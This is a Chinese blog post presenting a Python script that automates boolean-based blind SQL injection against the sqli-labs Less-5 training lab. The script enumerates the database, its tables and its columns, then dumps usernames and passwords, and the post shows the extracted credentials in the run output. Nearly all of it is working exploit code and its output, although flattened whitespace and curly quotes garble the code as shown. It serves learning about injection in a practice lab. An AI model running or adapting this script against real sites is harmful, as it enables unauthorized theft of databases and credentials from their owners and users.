python实现布尔型盲注的示例代码

好久没写python了，就想着写个简单的练练手，写个布尔型盲注自动化脚本，我觉得这个功能写的非常全了，这里是参考sqli-labs里面的盲注漏洞进行的脚本编写。

脚本运行时间：6分半左右

bool_sqlblind.py# -*- coding:utf-8 -*-# Author: mochu7import requestsdef ascii_str():#生成库名表名字符所在的字符列表字典 str_list=[] for i in range(33,127):#所有可显示字符 str_list.append(chr(i)) #print(’可显示字符：%s’%str_list) return str_list#返回字符列表def db_length(url,str): print('[-]开始测试数据库名长度.......') num=1 while True: db_payload=url+'’ and (length(database())=%d)--+'%num r=requests.get(db_payload) if str in r.text: db_length=num print('[+]数据库长度：%dn'%db_length) db_name(db_length)#进行下一步，测试库名 break else: num += 1def db_name(db_length): print('[-]开始测试数据库名.......') db_name=’’ str_list=ascii_str() for i in range(1,db_length+1): for j in str_list: db_payload=url+'’ and (ord(mid(database(),%d,1))=’%s’)--+'%(i,ord(j)) r=requests.get(db_payload) if str in r.text: db_name+=j break print('[+]数据库名：%sn'%db_name) tb_piece(db_name)#进行下一步，测试security数据库有几张表 return db_name def tb_piece(db_name): print('开始测试%s数据库有几张表........'%db_name) for i in range(100):#猜解库中有多少张表，合理范围即可 tb_payload=url+'’ and %d=(select count(table_name) from information_schema.tables where table_schema=’%s’)--+'%(i,db_name) r=requests.get(tb_payload) if str in r.text: tb_piece=i break print('[+]%s库一共有%d张表n'%(db_name,tb_piece)) tb_name(db_name,tb_piece)#进行下一步，猜解表名def tb_name(db_name,tb_piece): print('[-]开始猜解表名.......') table_list=[] for i in range(tb_piece): str_list=ascii_str() tb_length=0 tb_name=’’ for j in range(1,20):#表名长度，合理范围即可 tb_payload=url+'’ and (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d--+'%(i,j) r=requests.get(tb_payload) if str in r.text: tb_length=j print('第%d张表名长度：%s'%(i+1,tb_length)) for k in range(1,tb_length+1):#根据表名长度进行截取对比 for l in str_list: tb_payload=url+'’ and (select ord(mid((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)))=%d--+'%(i,k,ord(l)) r=requests.get(tb_payload) if str in r.text: tb_name+=l print('[+]：%s'%tb_name) table_list.append(tb_name) break print('n[+]%s库下的%s张表：%sn'%(db_name,tb_piece,table_list)) column_num(table_list,db_name)#进行下一步，猜解每张表的字段数def column_num(table_list,db_name): print('[-]开始猜解每张表的字段数：.......') column_num_list=[] for i in table_list: for j in range(30):#每张表的字段数量，合理范围即可 column_payload=url+'’ and %d=(select count(column_name) from information_schema.columns where table_name=’%s’)--+'%(j,i) r=requests.get(column_payload) if str in r.text: column_num=j column_num_list.append(column_num)#把所有表的字段，依次放入这个列表当中 print('[+]%s表t%s个字段'%(i,column_num)) break print('n[+]表对应的字段数：%sn'%column_num_list) column_name(table_list,column_num_list,db_name)#进行下一步，猜解每张表的字段名def column_name(table_list,column_num_list,db_name): print('[-]开始猜解每张表的字段名.......') column_length=[] str_list=ascii_str() column_name_list=[] for t in range(len(table_list)):#t在这里代表每张表的列表索引位置 print('n[+]%s表的字段：'%table_list[t]) for i in range(column_num_list[t]):#i表示每张表的字段数量 column_name=’’ for j in range(1,21):#j表示每个字段的长度 column_name_length=url+'’ and %d=(select length(column_name) from information_schema.columns where table_name=’%s’ limit %d,1)--+'%(j-1,table_list[t],i) r=requests.get(column_name_length) if str in r.text: column_length.append(j) break for k in str_list:#k表示我们猜解的字符字典 column_payload=url+'’ and ord(mid((select column_name from information_schema.columns where table_name=’%s’ limit %d,1),%d,1))=%d--+'%(table_list[t],i,j,ord(k)) r=requests.get(column_payload) if str in r.text: column_name+=k print(’[+]：%s’%column_name) column_name_list.append(column_name) #print(column_name_list)#输出所有表中的字段名到一个列表中 dump_data(table_list,column_name_list,db_name)#进行最后一步，输出指定字段的数据def dump_data(table_list,column_name_list,db_name): print('n[-]对%s表的%s字段进行爆破.......n'%(table_list[3],column_name_list[9:12])) str_list=ascii_str() for i in column_name_list[9:12]:#id,username,password字段 for j in range(101):#j表示有多少条数据，合理范围即可 data_num_payload=url+'’ and (select count(%s) from %s.%s)=%d--+'%(i,db_name,table_list[3],j) r=requests.get(data_num_payload) if str in r.text: data_num=j break print('n[+]%s表中的%s字段有以下%s条数据：'%(table_list[3],i,data_num)) for k in range(data_num): data_len=0 dump_data=’’ for l in range(1,21):#l表示每条数据的长度，合理范围即可 data_len_payload=url+'’ and ascii(substr((select %s from %s.%s limit %d,1),%d,1))--+'%(i,db_name,table_list[3],k,l) r=requests.get(data_len_payload) if str not in r.text: data_len=l-1 for x in range(1,data_len+1):#x表示每条数据的实际范围，作为mid截取的范围 for y in str_list: data_payload=url+'’ and ord(mid((select %s from %s.%s limit %d,1),%d,1))=%d--+'%(i,db_name,table_list[3],k,x,ord(y)) r=requests.get(data_payload) if str in r.text:dump_data+=ybreak break print(’[+]%s’%dump_data)#输出每条数据if __name__ == ’__main__’: url='http://127.0.0.1/sqli-labs/Less-5/?id=1'#目标url str='You are in'#布尔型盲注的true&false的判断因素 db_length(url,str)#程序入口

运行结果

PS C:UsersAdministratorDesktop> python3 .bool_sqlblind.py [-]开始测试数据库名长度.......[+]数据库长度：8

[-]开始测试数据库名.......[+]数据库名：security

开始测试security数据库有几张表........[+]security库一共有4张表

[-]开始猜解表名.......第1张表名长度：6[+]：emails第2张表名长度：8[+]：referers第3张表名长度：7[+]：uagents第4张表名长度：5[+]：users

[+]security库下的4张表：[’emails’, ’referers’, ’uagents’, ’users’]

[-]开始猜解每张表的字段数：.......[+]emails表 2个字段[+]referers表 3个字段[+]uagents表 4个字段[+]users表 7个字段

[+]表对应的字段数：[2, 3, 4, 7]

[-]开始猜解每张表的字段名.......

[+]emails表的字段：[+]：id[+]：email_id

[+]referers表的字段：[+]：id[+]：referer[+]：ip_address

[+]uagents表的字段：[+]：id[+]：uagent[+]：ip_address[+]：username

[+]users表的字段：[+]：id[+]：username[+]：password[+]：level[+]：id[+]：username[+]：password

[-]对users表的[’id’, ’username’, ’password’]字段进行爆破.......

[+]users表中的id字段有以下13条数据：[+]1[+]2[+]3[+]4[+]5[+]6[+]7[+]8[+]9[+]10[+]11[+]12[+]14

[+]users表中的username字段有以下13条数据：[+]Dumb[+]Angelina[+]Dummy[+]secure[+]stupid[+]superman[+]batman[+]admin[+]admin1[+]admin2[+]admin3[+]dhakkan[+]admin4

[+]users表中的password字段有以下13条数据：[+]Dumb[+]I-kill-you[+]p@ssword[+]crappy[+]stupidity[+]genious[+]mob!le[+]admin[+]admin1[+]admin2[+]admin3[+]dumbo[+]admin4PS C:UsersAdministratorDesktop>

到此这篇关于python实现布尔型盲注的示例代码的文章就介绍到这了,更多相关python布尔盲注内容请搜索好吧啦网以前的文章或继续浏览下面的相关文章希望大家以后多多支持好吧啦网！